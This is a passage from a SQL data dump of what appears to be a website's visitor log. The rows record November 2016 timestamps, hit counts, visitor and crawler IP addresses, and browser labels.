'),(75645,1479548149,1,1,0,0,'157.55.39.60','other'),(75646,1479548231,1,0,1,0,'66.249.76.155',''),(75647,1479548424,1,1,0,0,'207.46.13.92','other'),(75648,1479548683,1,1,0,0,'66.102.9.29','other'),(75649,1479550667,2,2,0,0,'157.55.39.24','other'),(75650,1479550947,1,1,0,0,'180.76.15.161','other'),(75651,1479551697,1,1,0,0,'176.100.161.142','chrome'),(75652,1479552839,1,1,0,0,'141.8.142.155','other'),(75653,1479554107,2,0,2,0,'66.249.66.183',''),(75654,1479554578,1,0,1,0,'68.180.230.220',''),(75655,1479564163,1,1,0,0,'141.8.183.25','other'),(75656,1479564166,1,1,0,0,'130.193.50.34','other'),(75657,1479564217,1,1,0,0,'157.55.39.24','other'),(75658,1479564410,1,0,1,0,'66.249.66.81',''),(75659,1479569129,1,0,1,0,'66.249.76.14',''),(75660,1479576044,1,1,0,0,'207.46.13.157','other'),(75661,1479577334,1,1,0,0,'40.77.167.11','other'),(75662,1479577432,1,1,0,0,'81.163.124.55','chrome'),(75663,1479578602,1,1,0,0,'66.102.9.29','other'),(75664,1479582950,1,1,0,0,'130.180.218.210','chrome'),(75665,1479583199,1,1,0,0,'130.193.50.34','other'),(75666,1479583472,1,0,1,0,'66.249.76.14',''),(75667,1479583729,1,1,0,0,'180.76.15.147','other'),(75668,1479585618,1,1,0,0,'176.105.211.140','other'),(75669,1479587207,1,0,1,0,'66.249.76.13',''),(75670,1479588333,2,0,2,0,'66.249.76.13',''),(75671,1479591039,1,1,0,0,'207.46.13.157','other'),(75672,1479593000,1,1,0,0,'66.102.9.29','other'),(75673,1479594391,1,1,0,0,'207.46.13.157','other'),(75674,1479598940,1,1,0,0,'180.76.15.33','other'),(75675,1479600226,1,1,0,0,'91.196.178.168','chrome'),(75676,1479600234,1,1,0,0,'141.8.142.58','other'),(75677,1479603161,1,1,0,0,'163.172.64.250','other'),(75678,1479603378,1,1,0,0,'141.8.142.67','other'),(75679,1479604150,1,1,0,0,'141.8.183.25','other'),(75680,1479604154,1,1,0,0,'130.193.50.34','other'),(75681,1479607273,5,5,0,0,'66.249.76.13','chrome'),(75682,1479607384,1,0,1,0,'66.249.76.15',''),(75683,1479607398,1,1,0,0,'66.102.9.29','other'),(75684,1479609451,1,1,0,0,'178.255.215.94','other'),(75685,1479610779,1,1,0,0,'95.28.37.112','msie'),(75686,1479613294,1,1,0,0,'188.255.16.240','msie'),(75687,1479613899,1,1,0,0,'95.84.138.81','msie'),(75688,1479614361,1,1,0,0,'157.55.39.60','other'),(75689,1479615149,1,1,0,0,'66.249.76.15','chrome'),(75690,1479618913,1,0,1,0,'66.249.76.14',''),(75691,1479619858,1,1,0,0,'40.77.167.11','other'),(75692,1479622933,1,0,1,0,'66.249.66.177',''),(75693,1479623110,1,1,0,0,'141.8.142.62','other'),(75694,1479625075,1,1,0,0,'141.8.183.25','other'),(75695,1479625079,1,1,0,0,'130.193.51.19','other'),(75696,1479625248,1,1,0,0,'40.77.167.11','other'),(75697,1479625326,1,1,0,0,'213.179.252.151','chrome'),(75698,1479626228,1,0,1,0,'66.249.76.13',''),(75699,1479626513,1,1,0,0,'94.179.209.79','firefox'),(75700,1479630965,1,1,0,0,'31.43.36.124','other'),(75701,1479631188,1,0,1,0,'66.249.76.14',''),(75702,1479632147,1,1,0,0,'66.249.76.14','chrome'),(75703,1479632172,1,1,0,0,'66.249.76.109','chrome'),(75704,1479632529,1,1,0,0,'66.249.93.143','chrome'),(75705,1479632602,1,1,0,0,'163.172.64.225','other'),(75706,1479633093,1,1,0,0,'186.202.120.146','firefox'),(75707,1479634126,1,1,0,0,'130.193.50.34','other'),(75708,1479634151,1,1,0,0,'163.172.64.247','other'),(75709,1479634259,1,0,1,0,'66.249.76.108',''),(75710,1479637275,1,0,1,0,'66.249.66.81',''),(75711,1479637470,1,1,0,0,'163.172.64.235','other'),(75712,1479637600,1,1,0,0,'163.172.64.246','other'),(75713,1479638118,1,1,0,0,'130.193.50.34','other'),(75714,1479638205,1,1,0,0,'141.8.183.25','other'),(75715,1479639246,1,1,0,0,'163.172.64.227','other'),(75716,1479640261,1,0,1,0,'66.249.76.15',''),(75717,1479645686,1,1,0,0,'130.193.50.34','other'),(75718,1479646234,1,0,1,0,'66.249.66.84',''),(75719,1479647304,1,1,0,0,'52.86.176.3','other'),(75720,1479648064,1,1,0,0,'207.46.13.157','other'),(75721,1479648611,1,1,0,0,'91.196.178.161','firefox'),(75722,1479649444,1,1,0,0,'66.249.76.14','chrome'),(75723,1479649745,1,1,0,0,'66.249.76.15','chrome'),(75724,1479649918,1,1,0,0,'66.249.76.13','chrome'),(75725,1479650079,1,1,0,0,'66.249.76.107','chrome'),(75726,1479653407,1,1,0,0,'37.54.114.207','firefox'),(75727,1479654212,1,1,0,0,'40.77.167.11','other'),(75728,1479654540,1,1,0,0,'207.46.13.99','other'),(75729,1479655151,1,0,1,0,'66.249.76.14',''),(75730,1479655842,1,0,1,0,'66.249.76.13',''),(75731,1479659898,1,1,0,0,'91.196.178.37','chrome'),(75732,1479662144,1,0,1,0,'66.249.76.13',''),(75733,1479663024,1,1,0,0,'66.102.9.27','chrome'),(75734,1479664251,2,2,0,0,'66.249.76.108','chrome'),(75735,1479665034,1,0,1,0,'66.249.76.15',''),(75736,1479665375,1,1,0,0,'94.179.17.17','chrome'),(75737,1479665970,1,1,0,0,'5.255.253.68','other'),(75738,1479667938,1,0,1,0,'66.249.66.87',''),(75739,1479669207,1,1,0,0,'163.172.64.186','other'),(75740,1479670558,1,1,0,0,'66.249.76.14','chrome'),(75741,1479671778,1,0,1,0,'68.180.229.190',''),(75742,1479673534,1,1,0,0,'46.211.69.135','chrome'),(75743,1479673566,1,1,0,0,'188.163.66.124','chrome'),(75744,1479675330,1,1,0,0,'163.172.64.199','other'),(75745,1479675773,1,1,0,0,'157.55.39.60','other'),(75746,1479675854,1,0,1,0,'68.180.229.190',''),(75747,1479676471,1,0,1,0,'66.249.76.15',''),(75748,1479678165,1,1,0,0,'163.172.64.177','other'),(75749,1479683058,1,1,0,0,'163.172.64.181','other'),(75750,1479683113,1,1,0,0,'163.172.64.183','other'),(75751,1479684232,1,0,1,0,'66.249.76.15',''),(75752,1479686003,1,1,0,0,'141.8.142.62','other'),(75753,1479686007,1,1,0,0,'141.8.132.2','other'),(75754,1479686487,1,0,1,0,'66.249.76.15',''),(75755,1479690158,1,1,0,0,'66.102.9.27','other'),(75756,1479691650,1,0,1,0,'66.249.76.13',''),(75757,1479691964,1,1,0,0,'163.172.64.237','other'),(75758,1479692212,1,1,0,0,'66.249.76.15','chrome'),(75759,1479693325,1,1,0,0,'163.172.64.187','other'),(75760,1479693393,1,1,0,0,'180.76.15.142','other'),(75761,1479694013,1,0,1,0,'66.249.76.108',''),(75762,1479695599,1,1,0,0,'163.172.64.247','other'),(75763,1479696790,1,0,1,0,'66.249.66.84',''),(75764,1479697339,1,1,0,0,'163.172.64.254','other'),(75765,1479699754,1,1,0,0,'66.249.76.13','chrome'),(75766,1479700939,1,0,1,0,'66.249.76.15',''),(75767,1479701389,1,0,1,0,'66.249.76.14',''),(75768,1479703268,1,1,0,0,'163.172.64.216','other'),(75769,1479704806,1,1,0,0,'66.102.9.25','other'),(75770,1479705496,1,1,0,0,'40.77.167.11','other'),(75771,1479706963,1,1,0,0,'141.8.183.25','other'),(75772,1479706967,1,1,0,0,'141.8.142.67','other'),(75773,1479707797,4,4,0,0,'188.240.208.219','other'),(75774,1479708163,1,0,1,0,'68.180.228.32',''),(75775,1479709584,1,1,0,0,'207.46.13.157','other'),(75776,1479711266,1,1,0,0,'40.77.167.11','other'),(75777,1479711863,1,1,0,0,'66.249.76.15','chrome'),(75778,1479712028,1,1,0,0,'163.172.64.180','other'),(75779,1479712104,2,2,0,0,'91.196.178.70','chrome'),(75780,1479713836,1,1,0,0,'66.249.76.13','chrome'),(75781,1479715029,1,1,0,0,'94.179.209.79','firefox'),(75782,1479715502,1,1,0,0,'91.196.178.67','chrome'),(75783,1479716242,2,1,1,0,'66.249.76.14',''),(75784,1479716275,1,1,0,0,'66.249.76.107','chrome'),(75785,1479717065,1,1,0,0,'77.93.37.60','chrome'),(75786,1479717600,1,1,0,0,'91.196.178.66','firefox'),(75787,1479717652,1,1,0,0,'94.179.209.79','firefox'),(75788,1479717818,4,4,0,0,'216.244.66.226','other'),(75789,1479717913,1,1,0,0,'82.207.91.234','firefox'),(75790,1479718285,1,1,0,0,'77.93.37.60','chrome'),(75791,1479718364,1,1,0,0,'62.80.166.58','chrome'),(75792,1479718962,1,1,0,0,'94.179.209.79','firefox'),(75793,1479719242,1,1,0,0,'66.102.9.29','other'),(75794,1479719801,1,1,0,0,'94.179.102.26','firefox'),(75795,1479720432,1,1,0,0,'91.196.178.66','firefox'),(75796,1479720553,1,1,0,0,'94.179.209.79','firefox'),(75797,1479721448,1,1,0,0,'31.148.253.65','chrome'),(75798,1479722252,10,10,0,0,'69.58.178.57','firefox'),(75799,1479723905,1,1,0,0,'91.196.178.136','chrome'),(75800,1479724475,4,4,0,0,'216.244.66.236','other'),(75801,1479726169,1,1,0,0,'91.196.178.72','firefox'),(75802,1479727839,1,1,0,0,'91.196.177.46','firefox'),(75803,1479727903,3,3,0,0,'130.193.50.34','other'),(75804,1479727933,1,1,0,0,'141.8.183.25','other'),(75805,1479728638,1,1,0,0,'91.196.178.163','chrome'),(75806,1479730035,1,1,0,0,'163.172.64.180','other'),(75807,1479731292,1,1,0,0,'178.251.111.188','chrome'),(75808,1479731611,1,1,0,0,'163.172.64.243','other'),(75809,1479731765,1,1,0,0,'94.179.209.79','firefox'),(75810,1479731913,1,1,0,0,'37.53.229.75','firefox'),(75811,1479732162,4,4,0,0,'216.244.66.226','other'),(75812,1479733116,1,1,0,0,'5.9.87.111','other'),(75813,1479733676,1,1,0,0,'66.102.9.27','other'),(75814,1479734893,1,1,0,0,'66.249.76.14','chrome'),(75815,1479735061,1,1,0,0,'66.249.76.15','chrome'),(75816,1479736116,1,1,0,0,'180.76.15.137','other'),(75817,1479736261,1,1,0,0,'66.249.76.14','chrome'),(75818,1479736611,1,1,0,0,'91.196.178.70','firefox'),(75819,1479737388,1,1,0,0,'91.196.178.34','firefox'),(75820,1479738213,1,1,0,0,'207.46.13.157','other'),(75821,1479738618,1,1,0,0,'207.46.13.99','other'),(75822,1479738803,1,0,1,0,'66.249.76.13',''),(75823,1479738844,1,1,0,0,'37.54.23.7','chrome'),(75824,1479738933,3,3,0,0,'216.244.66.236','other'),(75825,1479739315,1,0,1,0,'66.249.76.14',''),(75826,1479739350,1,1,0,0,'94.179.209.79','firefox'),(75827,1479739552,1,1,0,0,'163.172.64.192','other'),(75828,1479739880,1,1,0,0,'66.249.93.141','chrome'),(75829,1479740426,1,1,0,0,'207.46.13.99','other'),(75830,1479741006,1,0,1,0,'66.249.76.13',''),(75831,1479741367,1,1,0,0,'92.249.111.141','chrome'),(75832,1479741842,1,1,0,0,'178.92.171.183','chrome'),(75833,1479743011,1,1,0,0,'94.179.209.79','firefox'),(75834,1479743509,1,1,0,0,'91.196.178.70','firefox'),(75835,1479743969,1,1,0,0,'163.172.64.248','other'),(75836,1479745076,1,1,0,0,'180.76.15.154','other'),(75837,1479746149,1,1,0,0,'185.11.29.72','firefox'),(75838,1479746152,3,3,0,0,'216.244.66.226','other'),(75839,1479748015,1,1,0,0,'66.102.9.25','other'),(75840,1479748860,1,1,0,0,'130.193.50.34','other'),(75841,1479748864,1,1,0,0,'141.8.183.25','other'),(75842,1479749727,1,1,0,0,'78.111.190.56','chrome'),(75843,1479750738,1,1,0,0,'176.120.33.139','chrome'),(75844,1479751074,1,1,0,0,'134.249.168.207','chrome'),(75845,1479753260,12,12,0,0,'216.244.66.236','other'),(75846,1479753345,1,1,0,0,'157.55.39.117','other'),(75847,1479754308,1,1,0,0,'37.73.199.127','firefox'),(75848,1479755224,1,1,0,0,'91.196.178.34','chrome'),(75849,1479755313,1,1,0,0,'40.77.167.11','other'),(75850,1479756248,1,1,0,0,'180.76.15.32','other'),(75851,1479756623,1,1,0,0,'95.134.20.135','chrome'),(75852,1479756997,1,1,0,0,'66.249.76.109','chrome'),(75853,1479760588,4,4,0,0,'216.244.66.226','other'),(75854,1479760599,1,1,0,0,'178.137.83.79','chrome'),(75855,1479760813,1,1,0,0,'188.163.76.153','chrome'),(75856,1479761921,6,6,0,0,'216.244.66.226','other'),(75857,1479762421,1,1,0,0,'66.102.9.25','other'),(75858,1479762612,2,2,0,0,'62.210.148.247','other'),(75859,1479763933,1,1,0,0,'94.179.209.79','firefox'),(75860,1479765124,1,0,1,0,'66.249.66.81',''),(75861,1479769304,1,1,0,0,'180.76.15.143','other'),(75862,1479769584,2,2,0,0,'195.154.167.219','chrome'),(75863,1479769800,1,1,0,0,'130.193.50.34','other'),(75864,1479775011,4,4,0,0,'216.244.66.226','other'),(75865,1479775239,2,2,0,0,'207.46.13.157','other'),(75866,1479776869,1,1,0,0,'66.102.9.27','other'),(75867,1479777740,1,1,0,0,'180.76.15.18','other'),(75868,1479780014,1,1,0,0,'66.249.76.15','chrome'),(75869,1479785025,1,1,0,0,'157.55.39.184','other'),(75870,1479785556,1,0,1,0,'66.249.76.15',''),(75871,1479786691,1,0,1,0,'66.249.76.13',''),(75872,1479788746,1,1,0,0,'66.102.9.25','chrome'),(75873,1479790748,1,1,0,0,'130.193.50.34','other'),(75874,1479790831,1,1,0,0,'66.249.76.14','chrome'),(75875,1479791491,1,1,0,0,'66.102.9.25','other'),(75876,1479792361,2,2,0,0,'195.154.167.219','chrome'),(75877,1479792367,1,1,0,0,'40.77.167.11','other'),(75878,1479792802,1,1,0,0,'66.249.76.13','chrome'),(75879,1479793139,1,0,1,0,'66.249.76.107',''),(75880,1479793409,1,1,0,0,'207.46.13.157','other'),(75881,1479796369,1,1,0,0,'82.145.221.24','opera'),(75882,1479797743,1,1,0,0,'91.196.178.66','firefox'),(75883,1479798141,1,1,0,0,'91.196.178.164','chrome'),(75884,1479798202,1,1,0,0,'163.172.64.230','other'),(75885,1479798791,1,1,0,0,'66.249.93.143','chrome'),(75886,1479798824,1,1,0,0,'66.249.76.14','chrome'),(75887,1479798851,1,1,0,0,'66.249.76.109','chrome'),(75888,1479799192,1,1,0,0,'91.124.32.72','chrome'),(75889,1479799203,1,1,0,0,'141.8.183.25','other'),(75890,1479799477,1,1,0,0,'91.196.178.65','chrome'),(75891,1479799668,1,1,0,0,'91.196.176.13','chrome'),(75892,1479799787,1,1,0,0,'163.172.64.237','other'),(75893,1479802796,1,1,0,0,'130.180.220.33','firefox'),(75894,1479803628,1,1,0,0,'207.46.13.99','other'),(75895,1479803736,1,1,0,0,'216.244.66.226','other'),(75896,1479804791,1,1,0,0,'95.134.97.114','chrome'),(75897,1479805656,1,1,0,0,'141.8.183.25','other'),(75898,1479805658,1,1,0,0,'141.8.142.58','other'),(75899,1479805673,1,1,0,0,'66.102.9.25','other'),(75900,1479806416,1,0,1,0,'66.249.76.15',''),(75901,1479806500,1,1,0,0,'178.93.208.118','chrome'),(75902,1479807522,1,1,0,0,'212.1.98.242','chrome'),(75903,1479807746,1,1,0,0,'91.196.178.164','chrome'),(75904,1479808053,1,1,0,0,'91.196.178.169','chrome'),(75905,1479808875,1,1,0,0,'37.53.226.64','firefox'),(75906,1479808877,1,1,0,0,'94.179.209.79','firefox'),(75907,1479809039,1,1,0,0,'163.172.64.248','other'),(75908,1479809079,1,1,0,0,'91.196.178.67','chrome'),(75909,1479811307,2,2,0,0,'216.244.66.236','other'),(75910,1479811443,1,1,0,0,'5.9.111.70','other'),(75911,1479811712,1,1,0,0,'93.158.152.84','other'),(75912,1479811985,1,1,0,0,'207.46.13.99','other'),(75913,1479812260,1,1,0,0,'37.53.71.66','firefox'),(75914,1479812265,1,1,0,0,'141.8.183.25','other'),(75915,1479813176,2,1,1,0,'62.210.83.88',''),(75916,1479813668,1,0,1,0,'68.180.228.32',''),(75917,1479815205,1,1,0,0,'163.172.64.224','other'),(75918,1479816966,1,1,0,0,'163.172.64.188','other'),(75919,1479818208,1,1,0,0,'91.196.178.71','firefox'),(75920,1479819536,1,1,0,0,'207.46.13.157','other'),(75921,1479819555,1,1,0,0,'94.179.11.12','chrome'),(75922,1479820387,1,1,0,0,'37.54.18.200','chrome'),(75923,1479820651,1,1,0,0,'94.179.84.173','chrome'),(75924,1479820653,1,1,0,0,'66.102.9.27','other'),(75925,1479820986,1,1,0,0,'94.179.209.79','firefox'),(75926,1479822051,1,1,0,0,'192.162.237.47','firefox'),(75927,1479822846,1,1,0,0,'37.53.226.64','firefox'),(75928,1479822935,1,1,0,0,'37.55.46.27','chrome'),(75929,1479823815,1,1,0,0,'195.230.96.194','chrome'),(75930,1479823826,1,1,0,0,'130.193.50.34','other'),(75931,1479825469,1,1,0,0,'207.46.13.157','other'),(75932,1479828561,1,0,1,0,'66.249.76.13',''),(75933,1479828719,1,1,0,0,'40.77.167.11','other'),(75934,1479829237,1,1,0,0,'130.180.219.193','chrome'),(75935,1479830352,1,1,0,0,'78.111.186.131','chrome'),(75936,1479834567,1,1,0,0,'66.102.9.25','other'),(75937,1479834798,1,1,0,0,'180.76.15.9','other'),(75938,1479835347,1,1,0,0,'40.77.167.87','other'),(75939,1479835728,1,1,0,0,'163.172.64.222','other'),(75940,1479837946,1,1,0,0,'178.137.83.166','chrome'),(75941,1479838691,2,1,1,0,'62.210.83.88',''),(75942,1479838889,1,1,0,0,'207.46.13.157','other'),(75943,1479839923,1,1,0,0,'66.102.9.29','chrome'),(75944,1479840161,1,1,0,0,'163.172.64.182','other'),(75945,1479842738,1,1,0,0,'78.154.177.1','firefox'),(75946,1479842890,1,1,0,0,'94.179.209.79','firefox'),(75947,1479843426,1,1,0,0,'207.46.13.99','other'),(75948,1479843734,1,0,1,0,'66.249.76.14',''),(75949,1479845000,1,1,0,0,'64.246.165.50','firefox'),(75950,1479845177,1,1,0,0,'5.228.186.28','msie'),(75951,1479845372,1,0,1,0,'66.249.76.15',''),(75952,1479845431,1,1,0,0,'5.255.198.70','other'),(75953,1479845632,1,1,0,0,'163.172.64.186','other'),(75954,1479847194,1,1,0,0,'91.235.71.237','chrome'),(75955,1479847828,1,1,0,0,'176.14.34.104','msie'),(75956,1479848769,1,1,0,0,'37.204.119.218','msie'),(75957,1479849000,1,1,0,0,'66.102.9.27','other'),(75958,1479852683,1,0,1,0,'66.249.66.81',''),(75959,1479852899,1,0,1,0,'68.180.228.32',''),(75960,1479859753,1,1,0,0,'180.76.15.29','other'),(75961,1479860924,1,1,0,0,'180.76.15.148','other'),(75962,1479863344,1,1,0,0,'163.172.64.216','other'),(75963,1479863464,1,1,0,0,'66.102.9.25','other'),(75964,1479873304,1,0,1,0,'66.249.66.84',''),(75965,1479873384,1,1,0,0,'40.77.167.87','other'),(75966,1479873420,1,1,0,0,'217.69.133.169','firefox'),(75967,1479874423,1,1,0,0,'66.102.9.25','other'),(75968,1479876970,1,1,0,0,'91.229.123.7','chrome'),(75969,1479877271,1,1,0,0,'130.193.50.34','other'),(75970,1479877325,2,2,0,0,'141.8.142.67','other'),(75971,1479877329,1,1,0,0,'130.193.50.6','other'),(75972,1479877390,1,1,0,0,'130.193.51.19','other'),(75973,1479877407,1,1,0,0,'93.158.152.84','other'),(75974,1479877976,1,1,0,0,'66.102.9.29','other'),(75975,1479882132,1,1,0,0,'180.76.15.137','other'),(75976,1479883885,8,8,0,0,'69.30.198.186','other'),(75977,1479884428,1,1,0,0,'66.249.93.142','chrome'),(75978,1479885006,1,1,0,0,'82.207.91.234','firefox'),(75979,1479885349,1,1,0,0,'46.211.5.70','chrome'),(75980,1479886214,1,1,0,0,'95.133.196.10','chrome'),(75981,1479886250,1,1,0,0,'130.193.51.19','other'),(75982,1479888093,1,1,0,0,'94.179.110.148','firefox'),(75983,1479888972,1,1,0,0,'66.249.66.84','chrome'),(75984,1479889052,1,1,0,0,'66.249.66.180','chrome'),(75985,1479889689,1,1,0,0,'94.179.83.163','chrome'),(75986,1479889709,1,1,0,0,'37.55.20.23','chrome'),(75987,1479890454,2,2,0,0,'40.77.167.11','other'),(75988,1479890459,1,1,0,0,'207.46.13.99','other'),(75989,1479890464,1,1,0,0,'40.77.167.87','other'),(75990,1479891476,1,1,0,0,'163.172.64.229','other'),(75991,1479892309,1,1,0,0,'66.102.9.27','other'),(75992,1479893104,1,1,0,0,'79.135.220.106','chrome'),(75993,1479893245,1,1,0,0,'185.11.29.72','firefox'),(75994,1479894168,1,1,0,0,'207.46.13.99','other'),(75995,1479894270,1,1,0,0,'207.46.13.157','other'),(75996,1479894650,1,0,1,0,'66.249.76.15',''),(75997,1479895342,1,1,0,0,'94.179.209.79','firefox'),(75998,1479895625,1,1,0,0,'92.113.19.205','chrome'),(75999,1479896105,1,1,0,0,'37.53.228.18','firefox'),(76000,1479896815,1,1,0,0,'163.172.64.241','other'),(76001,1479897088,1,1,0,0,'91.196.178.66','firefox'),(76002,1479897277,1,1,0,0,'94.179.178.85','other'),(76003,1479897648,1,1,0,0,'185.11.29.72','firefox'),(76004,1479897890,1,1,0,0,'94.179.32.214','chrome'),(76005,1479898200,1,1,0,0,'37.53.228.18','firefox'),(76006,1479899762,1,1,0,0,'91.196.178.164','chrome'),(76007,1479900585,1,1,0,0,'176.38.40.192','chrome'),(76008,1479903729,1,1,0,0,'91.220.230.153','chrome'),(76009,1479904811,1,1,0,0,'91.196.178.67','firefox'),(76010,1479905522,1,1,0,0,'94.179.209.79','firefox'),(76011,1479905897,1,1,0,0,'37.53.228.18','firefox'),(76012,1479906099,1,1,0,0,'130.180.217.128','chrome'),(76013,1479906305,1,1,0,0,'91.196.178.65','chrome'),(76014,1479906840,1,1,0,0,'66.102.9.25','other'),(76015,1479907498,1,1,0,0,'40.77.167.11','other'),(76016,1479908480,1,1,0,0,'91.196.178.65','chrome'),(76017,1479908988,1,1,0,0,'91.196.178.70','chrome'),(76018,1479908996,1,1,0,0,'91.196.178.169','opera'),(76019,1479909392,1,1,0,0,'91.196.178.72','chrome'),(76020,1479909402,1,1,0,0,'207.46.13.157','other'),(76021,1479910439,78,78,0,0,'208.43.225.84','other'),(76022,1479911866,1,1,0,0,'91.196.178.67','firefox'),(76023,1479912157,1,1,0,0,'93.74.212.147','firefox'),(76024,1479912367,1,1,0,0,'78.111.190.39','chrome'),(76025,1479912380,1,1,0,0,'130.193.50.34','other'),(76026,1479912514,1,1,0,0,'91.196.178.70','msie'),(76027,1479915497,1,1,0,0,'66.102.9.27','other'),(76028,1479916234,1,1,0,0,'207.46.13.99','other'),(76029,1479916392,1,1,0,0,'37.53.228.18','firefox'),(76030,1479919228,1,1,0,0,'37.73.249.86','chrome'),(76031,1479919314,1,0,1,0,'66.249.76.15',''),(76032,1479921091,1,1,0,0,'66.102.9.25','other'),(76033,1479921331,1,1,0,0,'66.102.9.25','chrome'),(76034,1479925725,1,1,0,0,'188.248.26.23','firefox'),(76035,1479929883,2,1,1,0,'62.210.83.88',''),(76036,1479929918,1,1,0,0,'128.72.11.79','firefox'),(76037,1479931520,1,1,0,0,'185.26.180.219','other'),(76038,1479932823,1,1,0,0,'180.76.15.21','other'),(76039,1479933075,1,1,0,0,'5.255.253.55','other'),(76040,1479933104,1,1,0,0,'141.8.183.25','other'),(76041,1479934810,1,1,0,0,'2.92.35.126','chrome'),(76042,1479935698,1,1,0,0,'66.102.9.27','other'),(76043,1479935828,1,1,0,0,'128.69.235.116','chrome'),(76044,1479936187,1,1,0,0,'130.193.51.19','other'),(76045,1479937321,1,1,0,0,'180.76.15.139','other'),(76046,1479943366,1,0,1,0,'66.249.76.15',''),(76047,1479946035,1,1,0,0,'109.63.243.35','firefox'),(76048,1479950146,1,1,0,0,'66.102.9.27','other'),(76049,1479951003,1,0,1,0,'68.180.228.32',''),(76050,1479952364,1,0,1,0,'68.180.228.32',''),(76051,1479953807,1,1,0,0,'95.221.207.116','msie'),(76052,1479962117,1,1,0,0,'66.249.76.13','chrome'),(76053,1479964310,1,1,0,0,'66.102.9.29','other'),(76054,1479966341,1,0,1,0,'66.249.76.15',''),(76055,1479966363,1,1,0,0,'91.196.178.136','chrome'),(76056,1479967268,1,1,0,0,'130.193.50.34','other'),(76057,1479969952,1,1,0,0,'188.32.242.29','firefox'),(76058,1479970269,1,1,0,0,'66.249.93.142','chrome'),(76059,1479972048,1,1,0,0,'91.196.178.168','chrome'),(76060,1479972083,1,1,0,0,'130.193.50.34','other'),(76061,1479972358,1,1,0,0,'157.55.39.169','other'),(76062,1479972365,1,1,0,0,'37.54.57.160','chrome'),(76063,1479972712,1,1,0,0,'46.242.66.6','msie'),(76064,1479973884,1,1,0,0,'195.34.205.210','chrome'),(76065,1479974132,1,1,0,0,'37.53.231.145','firefox'),(76066,1479974256,1,1,0,0,'78.111.185.221','chrome'),(76067,1479975049,1,1,0,0,'130.193.50.34','other'),(76068,1479975050,1,1,0,0,'141.8.183.25','other'),(76069,1479978630,1,1,0,0,'91.196.176.13','chrome'),(76070,1479978740,1,1,0,0,'66.102.9.27','other'),(76071,1479979447,1,1,0,0,'94.179.121.211','firefox'),(76072,1479979917,1,1,0,0,'92.113.59.92','chrome'),(76073,1479980129,1,1,0,0,'163.172.64.241','other'),(76074,1479980384,1,1,0,0,'37.54.17.243','chrome'),(76075,1479980652,1,1,0,0,'207.46.13.157','other'),(76076,1479981877,1,1,0,0,'46.201.128.93','chrome'),(76077,1479982642,1,1,0,0,'46.211.2.170','other'),(76078,1479982970,2,2,0,0,'66.102.9.29','chrome'),(76079,1479984849,1,1,0,0,'91.196.178.72','firefox'),(76080,1479985114,1,1,0,0,'37.53.231.145','firefox'),(76081,1479985514,1,1,0,0,'109.87.30.225','chrome'),(76082,1479985527,1,1,0,0,'5.255.253.67','other'),(76083,1479986618,1,1,0,0,'91.196.178.69','firefox'),(76084,1479986645,1,0,1,0,'66.249.76.14',''),(76085,1479989580,1,1,0,0,'46.211.156.177','other'),(76086,1479990402,1,1,0,0,'37.53.231.145','firefox'),(76087,1479993153,1,1,0,0,'66.102.9.29','other'),(76088,1479993526,1,1,0,0,'37.53.122.15','chrome'),(76089,1479995507,1,1,0,0,'141.8.142.61','other'),(76090,1479995595,1,1,0,0,'163.172.64.188','other'),(76091,1479996060,1,1,0,0,'80.84.179.150','chrome'),(76092,1479996839,1,1,0,0,'91.196.178.70','firefox'),(76093,1479997343,1,1,0,0,'91.196.177.15','chrome'),(76094,1479999194,1,1,0,0,'37.53.231.145','firefox'),(76095,1479999677,1,1,0,0,'163.172.64.188','other'),(76096,1479999777,1,1,0,0,'163.172.64.230','other'),(76097,1479999910,1,1,0,0,'176.98.73.60','chrome'),(76098,1479999943,1,1,0,0,'130.193.51.19','other'),(76099,1480000088,1,0,1,0,'68.180.228.32',''),(76100,1480000170,1,1,0,0,'91.196.178.66','firefox'),(76101,1480000356,1,0,1,0,'68.180.229.190',''),(76102,1480000675,1,1,0,0,'37.53.231.145','firefox'),(76103,1480001521,2,0,2,0,'68.180.228.32',''),(76104,1480003669,1,1,0,0,'141.0.13.204','other'),(76105,1480004048,1,1,0,0,'94.179.209.79','firefox'),(76106,1480004338,1,1,0,0,'31.13.102.100','other'),(76107,1480004351,1,1,0,0,'31.13.113.192','other'),(76108,1480004629,1,1,0,0,'82.193.115.183','chrome'),(76109,1480004692,1,1,0,0,'66.249.76.13','chrome'),(76110,1480005194,1,1,0,0,'95.133.153.142','chrome'),(76111,1480005333,1,1,0,0,'141.0.13.204','other'),(76112,1480005394,1,1,0,0,'46.201.253.68','chrome'),(76113,1480005750,1,1,0,0,'37.73.204.8','chrome'),(76114,1480006432,1,1,0,0,'66.249.76.13','chrome'),(76115,1480007042,1,1,0,0,'82.145.220.25','other'),(76116,1480007174,1,0,1,0,'66.249.76.14',''),(76117,1480007700,1,1,0,0,'66.102.9.27','other'),(76118,1480008375,1,1,0,0,'95.132.135.209','chrome'),(76119,1480009789,1,1,0,0,'141.0.12.56','other'),(76120,1480010311,1,1,0,0,'91.235.71.237','chrome'),(76121,1480011095,1,1,0,0,'37.73.204.8','chrome'),(76122,1480011930,2,2,0,0,'130.193.50.34','other'),(76123,1480011980,1,1,0,0,'40.77.167.48','other'),(76124,1480012155,1,1,0,0,'94.179.117.1','firefox'),(76125,1480012222,1,1,0,0,'94.178.245.141','chrome'),(76126,1480012610,1,0,1,0,'68.180.229.190',''),(76127,1480013216,1,1,0,0,'163.172.64.236','other'),(76128,1480013992,1,1,0,0,'82.145.223.113','other'),(76129,1480015542,1,1,0,0,'82.145.222.178','other'),(76130,1480015643,1,1,0,0,'66.249.76.13','chrome'),(76131,1480016466,2,2,0,0,'178.137.83.84','other'),(76132,1480017038,1,0,1,0,'68.180.228.32',''),(76133,1480017417,1,1,0,0,'66.249.76.15','chrome'),(76134,1480017977,1,1,0,0,'40.77.167.11','other'),(76135,1480021279,1,1,0,0,'128.68.33.134','msie'),(76136,1480022053,1,1,0,0,'66.102.9.27','other'),(76137,1480023038,1,1,0,0,'180.76.15.7','other'),(76138,1480023967,1,1,0,0,'188.163.69.66','chrome'),(76139,1480024252,1,1,0,0,'40.77.167.48','other'),(76140,1480024282,1,1,0,0,'40.77.167.11','other'),(76141,1480025115,1,1,0,0,'91.196.178.101','chrome'),(76142,1480025480,1,1,0,0,'40.77.167.48','other'),(76143,1480026020,1,1,0,0,'163.172.64.227','other'),(76144,1480026189,1,1,0,0,'91.196.178.101','chrome'),(76145,1480028163,1,0,1,0,'66.249.76.15',''),(76146,1480028744,1,1,0,0,'163.172.64.178','other'),(76147,1480030873,1,1,0,0,'163.172.64.216','other'),(76148,1480031570,1,1,0,0,'66.249.76.13','chrome'),(76149,1480034138,1,1,0,0,'163.172.64.188','other')